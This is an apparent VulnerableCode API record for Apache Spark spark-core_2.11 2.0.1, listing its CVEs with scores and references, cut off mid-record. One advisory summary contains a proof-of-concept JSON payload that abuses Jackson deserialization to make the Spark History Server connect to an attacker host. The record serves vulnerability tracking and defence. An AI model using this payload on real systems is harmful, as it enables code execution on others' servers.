Lookup for vulnerable packages by Package URL.

GET /api/packages/162818?format=api
HTTP 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "url": "http://public2.vulnerablecode.io/api/packages/162818?format=api",
    "purl": "pkg:maven/org.apache.spark/spark-core_2.11@2.0.1",
    "type": "maven",
    "namespace": "org.apache.spark",
    "name": "spark-core_2.11",
    "version": "2.0.1",
    "qualifiers": {},
    "subpath": "",
    "is_vulnerable": true,
    "next_non_vulnerable_version": null,
    "latest_non_vulnerable_version": null,
    "affected_by_vulnerabilities": [
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/22590?format=api",
            "vulnerability_id": "VCID-1gtx-thb1-9ud6",
            "summary": "Apache Spark: Spark History Server Code Execution Vulnerability\nThis issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue.\n\n## Summary\n\nApache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server.\n\n## Details\n\nThe vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization.\n\nThe attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability.\n\n## Proof of Concept:\n\n1. Run Spark with event logging enabled, writing to a writable directory (spark-logs).\n\n2. Inject the following JSON at the beginning of an event log file:\n\n```\n{\n\n  \"Event\": \"org.apache.hive.jdbc.HiveConnection\",\n  \"uri\": \"jdbc:hive2://<IP>:<PORT>/\",\n  \"info\": {\n    \"hive.metastore.uris\": \"thrift://<IP>:<PORT>\"\n  }\n}\n```\n3. Start the Spark History Server with logs pointing to the modified directory.\n\n4. The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection.\n\n## Impact\n\nAn attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.",
            "references": [
                {
                    "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-54920.json",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.7",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L"
                        }
                    ],
                    "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-54920.json"
                },
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-54920",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00498",
                            "scoring_system": "epss",
                            "scoring_elements": "0.65871",
                            "published_at": "2026-04-04T12:55:00Z"
                        },
                        {
                            "value": "0.00498",
                            "scoring_system": "epss",
                            "scoring_elements": "0.65841",
                            "published_at": "2026-04-02T12:55:00Z"
                        },
                        {
                            "value": "0.00498",
                            "scoring_system": "epss",
                            "scoring_elements": "0.65837",
                            "published_at": "2026-04-07T12:55:00Z"
                        },
                        {
                            "value": "0.00539",
                            "scoring_system": "epss",
                            "scoring_elements": "0.67637",
                            "published_at": "2026-05-05T12:55:00Z"
                        },
                        {
                            "value": "0.00539",
                            "scoring_system": "epss",
                            "scoring_elements": "0.6766",
                            "published_at": "2026-04-26T12:55:00Z"
                        },
                        {
                            "value": "0.00539",
                            "scoring_system": "epss",
                            "scoring_elements": "0.67662",
                            "published_at": "2026-04-29T12:55:00Z"
                        },
                        {
                            "value": "0.00674",
                            "scoring_system": "epss",
                            "scoring_elements": "0.71428",
                            "published_at": "2026-04-11T12:55:00Z"
                        },
                        {
                            "value": "0.00674",
                            "scoring_system": "epss",
                            "scoring_elements": "0.71395",
                            "published_at": "2026-04-13T12:55:00Z"
                        },
                        {
                            "value": "0.00674",
                            "scoring_system": "epss",
                            "scoring_elements": "0.71412",
                            "published_at": "2026-04-12T12:55:00Z"
                        },
                        {
                            "value": "0.00674",
                            "scoring_system": "epss",
                            "scoring_elements": "0.71405",
                            "published_at": "2026-04-09T12:55:00Z"
                        },
                        {
                            "value": "0.00674",
                            "scoring_system": "epss",
                            "scoring_elements": "0.71392",
                            "published_at": "2026-04-08T12:55:00Z"
                        },
                        {
                            "value": "0.00718",
                            "scoring_system": "epss",
                            "scoring_elements": "0.72489",
                            "published_at": "2026-04-18T12:55:00Z"
                        },
                        {
                            "value": "0.00718",
                            "scoring_system": "epss",
                            "scoring_elements": "0.72478",
                            "published_at": "2026-04-21T12:55:00Z"
                        },
                        {
                            "value": "0.00718",
                            "scoring_system": "epss",
                            "scoring_elements": "0.7248",
                            "published_at": "2026-04-16T12:55:00Z"
                        },
                        {
                            "value": "0.00718",
                            "scoring_system": "epss",
                            "scoring_elements": "0.7252",
                            "published_at": "2026-04-24T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-54920"
                },
                {
                    "reference_url": "https://github.com/apache/spark",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/apache/spark"
                },
                {
                    "reference_url": "https://github.com/apache/spark/pull/51312",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T03:55:33Z/"
                        }
                    ],
                    "url": "https://github.com/apache/spark/pull/51312"
                },
                {
                    "reference_url": "https://github.com/apache/spark/pull/51323",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T03:55:33Z/"
                        }
                    ],
                    "url": "https://github.com/apache/spark/pull/51323"
                },
                {
                    "reference_url": "https://issues.apache.org/jira/browse/SPARK-52381",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T03:55:33Z/"
                        }
                    ],
                    "url": "https://issues.apache.org/jira/browse/SPARK-52381"
                },
                {
                    "reference_url": "https://lists.apache.org/thread/4y9n0nfj7m68o2hpmoxgc0y7dm1lo02s",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T03:55:33Z/"
                        }
                    ],
                    "url": "https://lists.apache.org/thread/4y9n0nfj7m68o2hpmoxgc0y7dm1lo02s"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54920",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54920"
                },
                {
                    "reference_url": "http://www.openwall.com/lists/oss-security/2026/03/13/4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "http://www.openwall.com/lists/oss-security/2026/03/13/4"
                },
                {
                    "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447599",
                    "reference_id": "2447599",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447599"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-jwp6-cvj8-fw65",
                    "reference_id": "GHSA-jwp6-cvj8-fw65",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-jwp6-cvj8-fw65"
                }
            ],
            "fixed_packages": [],
            "aliases": [
                "CVE-2025-54920",
                "GHSA-jwp6-cvj8-fw65"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1gtx-thb1-9ud6"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/4536?format=api",
            "vulnerability_id": "VCID-6he5-ksrc-8kck",
            "summary": "In Apache Spark 1.6.0 until 2.1.1, the launcher API performs unsafe deserialization of data received by its socket. This makes applications launched programmatically using the launcher API potentially vulnerable to arbitrary code execution by an attacker with access to any user account on the local machine. It does not affect apps run by spark-submit or spark-shell. The attacker would be able to execute code as the user that ran the Spark application. Users are encouraged to update to version 2.2.0 or later.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2017-12612",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00066",
                            "scoring_system": "epss",
                            "scoring_elements": "0.20123",
                            "published_at": "2026-05-05T12:55:00Z"
                        },
                        {
                            "value": "0.00144",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34814",
                            "published_at": "2026-04-02T12:55:00Z"
                        },
                        {
                            "value": "0.00144",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34841",
                            "published_at": "2026-04-04T12:55:00Z"
                        },
                        {
                            "value": "0.00144",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34716",
                            "published_at": "2026-04-07T12:55:00Z"
                        },
                        {
                            "value": "0.00144",
                            "scoring_system": "epss",
                            "scoring_elements": "0.3476",
                            "published_at": "2026-04-08T12:55:00Z"
                        },
                        {
                            "value": "0.00144",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34788",
                            "published_at": "2026-04-09T12:55:00Z"
                        },
                        {
                            "value": "0.00144",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34793",
                            "published_at": "2026-04-11T12:55:00Z"
                        },
                        {
                            "value": "0.00144",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34754",
                            "published_at": "2026-04-12T12:55:00Z"
                        },
                        {
                            "value": "0.00144",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34729",
                            "published_at": "2026-04-13T12:55:00Z"
                        },
                        {
                            "value": "0.00144",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34763",
                            "published_at": "2026-04-16T12:55:00Z"
                        },
                        {
                            "value": "0.00144",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34748",
                            "published_at": "2026-04-18T12:55:00Z"
                        },
                        {
                            "value": "0.00144",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34709",
                            "published_at": "2026-04-21T12:55:00Z"
                        },
                        {
                            "value": "0.00144",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34476",
                            "published_at": "2026-04-24T12:55:00Z"
                        },
                        {
                            "value": "0.00144",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34457",
                            "published_at": "2026-04-26T12:55:00Z"
                        },
                        {
                            "value": "0.00144",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34371",
                            "published_at": "2026-04-29T12:55:00Z"
                        },
                        {
                            "value": "0.00144",
                            "scoring_system": "epss",
                            "scoring_elements": "0.346",
                            "published_at": "2026-04-01T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2017-12612"
                },
                {
                    "reference_url": "https://github.com/apache/spark/commit/0b25a7d93359e348e11b2e8698990a53436b3c5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/apache/spark/commit/0b25a7d93359e348e11b2e8698990a53436b3c5"
                },
                {
                    "reference_url": "https://github.com/apache/spark/commit/4cba3b5a350f4d477466fc73b32cbd653eee840",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/apache/spark/commit/4cba3b5a350f4d477466fc73b32cbd653eee840"
                },
                {
                    "reference_url": "https://github.com/apache/spark/commit/772a9b969aa179150aa216e9efd950e512e9d0b4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/apache/spark/commit/772a9b969aa179150aa216e9efd950e512e9d0b4"
                },
                {
                    "reference_url": "https://github.com/apache/spark/commit/8efc6e986554ae66eab93cd64a9035d716adbab",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/apache/spark/commit/8efc6e986554ae66eab93cd64a9035d716adbab"
                },
                {
                    "reference_url": "https://github.com/apache/spark/commit/9952b53b57498852cba799b47f00238e52114c7c",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/apache/spark/commit/9952b53b57498852cba799b47f00238e52114c7c"
                },
                {
                    "reference_url": "https://github.com/apache/spark/commit/f7cbf90a72a19476ea2d3d1ddc96c45a24b9f57",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/apache/spark/commit/f7cbf90a72a19476ea2d3d1ddc96c45a24b9f57"
                },
                {
                    "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyspark/PYSEC-2017-147.yaml",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyspark/PYSEC-2017-147.yaml"
                },
                {
                    "reference_url": "https://mail-archives.apache.org/mod_mbox/spark-dev/201709.mbox/%3CCAEccTyy-1yYuhdNgkBUg0sr9NeaZSrBKkBePdTNZbxXZNTAR-g%40mail.gmail.com%3E",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://mail-archives.apache.org/mod_mbox/spark-dev/201709.mbox/%3CCAEccTyy-1yYuhdNgkBUg0sr9NeaZSrBKkBePdTNZbxXZNTAR-g%40mail.gmail.com%3E"
                },
                {
                    "reference_url": "http://www.securityfocus.com/bid/100823",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        }
                    ],
                    "url": "http://www.securityfocus.com/bid/100823"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:spark:1.6.0:*:*:*:*:*:*:*",
                    "reference_id": "cpe:2.3:a:apache:spark:1.6.0:*:*:*:*:*:*:*",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:spark:1.6.0:*:*:*:*:*:*:*"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:spark:1.6.1:*:*:*:*:*:*:*",
                    "reference_id": "cpe:2.3:a:apache:spark:1.6.1:*:*:*:*:*:*:*",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:spark:1.6.1:*:*:*:*:*:*:*"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:spark:1.6.2:*:*:*:*:*:*:*",
                    "reference_id": "cpe:2.3:a:apache:spark:1.6.2:*:*:*:*:*:*:*",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:spark:1.6.2:*:*:*:*:*:*:*"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:spark:1.6.3:*:*:*:*:*:*:*",
                    "reference_id": "cpe:2.3:a:apache:spark:1.6.3:*:*:*:*:*:*:*",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:spark:1.6.3:*:*:*:*:*:*:*"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:spark:2.0.0:*:*:*:*:*:*:*",
                    "reference_id": "cpe:2.3:a:apache:spark:2.0.0:*:*:*:*:*:*:*",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:spark:2.0.0:*:*:*:*:*:*:*"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:spark:2.0.1:*:*:*:*:*:*:*",
                    "reference_id": "cpe:2.3:a:apache:spark:2.0.1:*:*:*:*:*:*:*",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:spark:2.0.1:*:*:*:*:*:*:*"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:spark:2.0.2:*:*:*:*:*:*:*",
                    "reference_id": "cpe:2.3:a:apache:spark:2.0.2:*:*:*:*:*:*:*",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:spark:2.0.2:*:*:*:*:*:*:*"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:spark:2.1.0:*:*:*:*:*:*:*",
                    "reference_id": "cpe:2.3:a:apache:spark:2.1.0:*:*:*:*:*:*:*",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:spark:2.1.0:*:*:*:*:*:*:*"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:spark:2.1.1:*:*:*:*:*:*:*",
                    "reference_id": "cpe:2.3:a:apache:spark:2.1.1:*:*:*:*:*:*:*",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:spark:2.1.1:*:*:*:*:*:*:*"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2017-12612",
                    "reference_id": "CVE-2017-12612",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:L/AC:L/Au:N/C:C/I:C/A:C"
                        },
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-12612"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-8rhc-48pp-52gr",
                    "reference_id": "GHSA-8rhc-48pp-52gr",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-8rhc-48pp-52gr"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/33122?format=api",
                    "purl": "pkg:maven/org.apache.spark/spark-core_2.11@2.1.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1gtx-thb1-9ud6"
                        },
                        {
                            "vulnerability": "VCID-as3y-ffvw-rube"
                        },
                        {
                            "vulnerability": "VCID-m3tv-j5mk-4ufj"
                        },
                        {
                            "vulnerability": "VCID-pa42-1gk4-9yhj"
                        },
                        {
                            "vulnerability": "VCID-pgne-36yk-37bj"
                        },
                        {
                            "vulnerability": "VCID-vqmm-ru8x-ukcx"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.1.2"
                }
            ],
            "aliases": [
                "CVE-2017-12612",
                "GHSA-8rhc-48pp-52gr",
                "PYSEC-2017-147"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6he5-ksrc-8kck"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/7990?format=api",
            "vulnerability_id": "VCID-adht-u2kn-j3hh",
            "summary": "Cross-site Scripting\nIt is possible for an attacker to take advantage of a user's trust in the server to trick them into visiting a link that points to a shared Spark cluster and submits data including MHTML to the Spark master, or history server. This data, which could contain a script, would then be reflected back to the user and could be evaluated and executed by MS Windows-based clients. It is not an attack on Spark itself, but on the user, who may then execute the script inadvertently when viewing elements of the Spark web UIs.",
            "references": [
                {
                    "reference_url": "http://apache-spark-developers-list.1001551.n3.nabble.com/CVE-2017-7678-Apache-Spark-XSS-web-UI-MHTML-vulnerability-td21947.html",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "http://apache-spark-developers-list.1001551.n3.nabble.com/CVE-2017-7678-Apache-Spark-XSS-web-UI-MHTML-vulnerability-td21947.html"
                },
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2017-7678",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.01222",
                            "scoring_system": "epss",
                            "scoring_elements": "0.79192",
                            "published_at": "2026-05-05T12:55:00Z"
                        },
                        {
                            "value": "0.0179",
                            "scoring_system": "epss",
                            "scoring_elements": "0.82709",
                            "published_at": "2026-04-07T12:55:00Z"
                        },
                        {
                            "value": "0.0179",
                            "scoring_system": "epss",
                            "scoring_elements": "0.82752",
                            "published_at": "2026-04-12T12:55:00Z"
                        },
                        {
                            "value": "0.0179",
                            "scoring_system": "epss",
                            "scoring_elements": "0.82749",
                            "published_at": "2026-04-13T12:55:00Z"
                        },
                        {
                            "value": "0.0179",
                            "scoring_system": "epss",
                            "scoring_elements": "0.82787",
                            "published_at": "2026-04-18T12:55:00Z"
                        },
                        {
                            "value": "0.0179",
                            "scoring_system": "epss",
                            "scoring_elements": "0.82791",
                            "published_at": "2026-04-21T12:55:00Z"
                        },
                        {
                            "value": "0.0179",
                            "scoring_system": "epss",
                            "scoring_elements": "0.82813",
                            "published_at": "2026-04-24T12:55:00Z"
                        },
                        {
                            "value": "0.0179",
                            "scoring_system": "epss",
                            "scoring_elements": "0.82822",
                            "published_at": "2026-04-26T12:55:00Z"
                        },
                        {
                            "value": "0.0179",
                            "scoring_system": "epss",
                            "scoring_elements": "0.82828",
                            "published_at": "2026-04-29T12:55:00Z"
                        },
                        {
                            "value": "0.0179",
                            "scoring_system": "epss",
                            "scoring_elements": "0.82683",
                            "published_at": "2026-04-01T12:55:00Z"
                        },
                        {
                            "value": "0.0179",
                            "scoring_system": "epss",
                            "scoring_elements": "0.82699",
                            "published_at": "2026-04-02T12:55:00Z"
                        },
                        {
                            "value": "0.0179",
                            "scoring_system": "epss",
                            "scoring_elements": "0.82713",
                            "published_at": "2026-04-04T12:55:00Z"
                        },
                        {
                            "value": "0.0179",
                            "scoring_system": "epss",
                            "scoring_elements": "0.82735",
                            "published_at": "2026-04-08T12:55:00Z"
                        },
                        {
                            "value": "0.0179",
                            "scoring_system": "epss",
                            "scoring_elements": "0.82742",
                            "published_at": "2026-04-09T12:55:00Z"
                        },
                        {
                            "value": "0.0179",
                            "scoring_system": "epss",
                            "scoring_elements": "0.82758",
                            "published_at": "2026-04-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2017-7678"
                },
                {
                    "reference_url": "http://www.securityfocus.com/bid/99603",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "http://www.securityfocus.com/bid/99603"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7678",
                    "reference_id": "CVE-2017-7678",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7678"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-r34r-f84j-5x4x",
                    "reference_id": "GHSA-r34r-f84j-5x4x",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-r34r-f84j-5x4x"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/33122?format=api",
